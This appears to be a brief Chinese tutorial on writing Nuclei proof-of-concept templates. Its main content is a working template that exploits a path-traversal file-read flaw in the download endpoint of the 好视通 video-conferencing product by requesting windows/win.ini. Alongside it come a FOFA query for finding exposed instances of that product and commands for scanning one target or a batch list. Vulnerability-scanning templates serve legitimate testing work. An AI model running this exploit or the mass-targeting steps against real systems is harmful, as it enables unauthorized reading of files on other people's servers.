nuclei poc简单编写

#官网：https://nuclei.projectdiscovery.io/#项目地址：https://github.com/projectdiscovery/nucleihttps://github.com/projectdiscovery/nuclei-burp-plugin#Nuclei-Templates项目地址：https://github.com/projectdiscovery/nuclei-templates#其他参考:https://r0fus0d.blog.ffffffff0x.com/post/nuclei/

#中文介绍https://github.com/projectdiscovery/nuclei/blob/main/README_CN.md#mac平台安装brew install nuclei#windows安装https://github.com/projectdiscovery/nuclei/releases#配置环境变量即可

#下载插件jar:https://github.com/projectdiscovery/nuclei-burp-plugin

id: hst_readfileinfo:  name: hst_readfile  author: pro  severity: info  description: https://hst.com/  tags: hst,readhttp:  - raw:      - |        GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/jxl,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        sec-ch-ua-platform: "Windows"        sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"        sec-ch-ua-mobile: ?0    matchers:      - type: word        words:          - "[fonts]"          - "[extensions]"        condition: and      - type: status        status:          - 200

#fofa语法app="好视通-视频会议"nuclei使用#单个目标检测nuclei -t 111.yaml -u https://xxxx/#批量检测nuclei -l url2.txt  -t 111.yaml